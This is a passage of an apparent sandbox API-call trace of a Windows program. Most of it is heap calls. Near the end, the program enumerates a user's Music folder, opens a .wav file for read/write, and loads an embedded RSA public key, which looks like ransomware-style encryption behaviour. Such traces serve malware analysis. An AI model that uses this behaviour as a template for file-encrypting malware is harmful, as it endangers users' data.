returned 0x2d154b0 [0189.834] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0189.834] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.835] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0189.835] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.835] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.835] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0189.835] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.836] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.836] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0189.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.837] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.837] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.837] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.837] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.837] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.837] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.837] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.838] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.838] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.838] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.838] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.838] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.838] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.838] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.839] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.839] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.839] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.839] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.839] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.840] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.840] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.840] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.840] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.840] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.840] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.840] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.841] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.841] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.841] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.841] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.841] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0189.842] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.842] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0189.842] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.842] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.843] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.843] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.843] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.843] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.843] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0189.844] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.844] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.844] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.844] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0189.844] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.844] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.844] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.845] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.845] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.845] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.845] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.845] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.846] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.846] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.846] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.846] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.846] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0189.846] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.847] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0189.847] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.847] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.847] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0189.847] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.848] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.848] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.848] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0189.848] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.848] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.848] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.848] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.849] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.849] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.849] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.849] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.849] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.850] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.850] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.850] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.850] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.850] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.850] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.850] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.851] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.851] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.851] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.851] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.851] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.851] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.852] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.852] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.852] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.852] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.852] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.852] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.853] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.853] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.853] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.853] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.853] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0189.853] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.853] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0189.854] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.854] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.854] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.854] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.855] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.855] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.855] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0189.855] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.856] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.856] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.856] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0189.856] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.856] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.857] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.857] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.857] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.857] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.857] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.857] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.858] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.858] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.858] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.858] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.858] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0189.858] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.859] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0189.859] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.859] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.859] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0189.859] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.860] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.860] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.860] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.860] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.861] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.861] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.861] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.861] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.861] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.861] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.861] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.862] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.862] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.862] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.862] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.862] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.863] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.863] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.863] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.863] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\") returned="fUhvLY4JeAGwk\\" [0189.863] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0189.864] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d39408 [0189.864] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.864] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\") returned="Music\\" [0189.864] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0189.864] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39408 | out: hHeap=0x6a0000) returned 1 [0189.864] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0189.864] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0189.865] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0189.865] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0189.865] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0189.865] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0189.865] PathFindFileNameW (pszPath="") returned="" [0189.865] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0189.865] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\*" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1abd4b0, ftCreationTime.dwHighDateTime=0x1d8a3eb, ftLastAccessTime.dwLowDateTime=0x6bfe5650, ftLastAccessTime.dwHighDateTime=0x1d8a457, ftLastWriteTime.dwLowDateTime=0x6bfe5650, ftLastWriteTime.dwHighDateTime=0x1d8a457, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0189.867] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0189.867] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1abd4b0, ftCreationTime.dwHighDateTime=0x1d8a3eb, ftLastAccessTime.dwLowDateTime=0x6bfe5650, ftLastAccessTime.dwHighDateTime=0x1d8a457, ftLastWriteTime.dwLowDateTime=0x6bfe5650, ftLastWriteTime.dwHighDateTime=0x1d8a457, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0189.867] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1103610, ftCreationTime.dwHighDateTime=0x1d899ee, ftLastAccessTime.dwLowDateTime=0x6eb6c8c0, ftLastAccessTime.dwHighDateTime=0x1d89cc6, ftLastWriteTime.dwLowDateTime=0x6eb6c8c0, ftLastWriteTime.dwHighDateTime=0x1d89cc6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iPggquG4", cAlternateFileName="")) returned 1 [0189.867] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0189.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8e) returned 0x794008 [0189.868] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0189.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0189.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfc) returned 0x2c70bc8 [0189.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0189.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.868] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5116cc00, ftCreationTime.dwHighDateTime=0x1d89abb, ftLastAccessTime.dwLowDateTime=0xeb1119a0, ftLastAccessTime.dwHighDateTime=0x1d89c9b, ftLastWriteTime.dwLowDateTime=0xeb1119a0, ftLastWriteTime.dwHighDateTime=0x1d89c9b, nFileSizeHigh=0x0, nFileSizeLow=0x145db, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LNo4VDj5U-Z.wav", cAlternateFileName="LNO4VD~1.WAV")) returned 1 [0189.868] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\LNo4VDj5U-Z.wav") returned=".wav" [0189.868] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\LNo4VDj5U-Z.wav" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\lno4vdj5u-z.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0189.870] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=83419) returned 1 [0189.870] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0189.873] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x145b5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.873] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0189.878] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0189.879] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0189.879] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0189.879] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x145db, lpOverlapped=0x0) returned 1 [0189.880] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.880] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0189.880] lstrlenA (lpString="-----BEGIN PUBLIC 